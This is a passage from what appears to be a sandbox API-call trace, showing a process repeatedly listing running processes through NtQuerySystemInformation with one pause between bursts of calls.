ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.850] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.850] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.862] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.862] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.876] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.876] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.877] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.877] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.890] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.890] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.891] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.891] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.892] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.893] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.893] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.900] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.902] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.902] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.903] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.907] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.920] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0210.425] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.440] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.440] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.441] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.456] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.458] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.459] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.459] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.461] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.461] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.462] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.469] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.469] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.473] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.473] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.475] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.495] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.496] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.496] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.497] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.497] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.498] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.498] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.498] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.500] 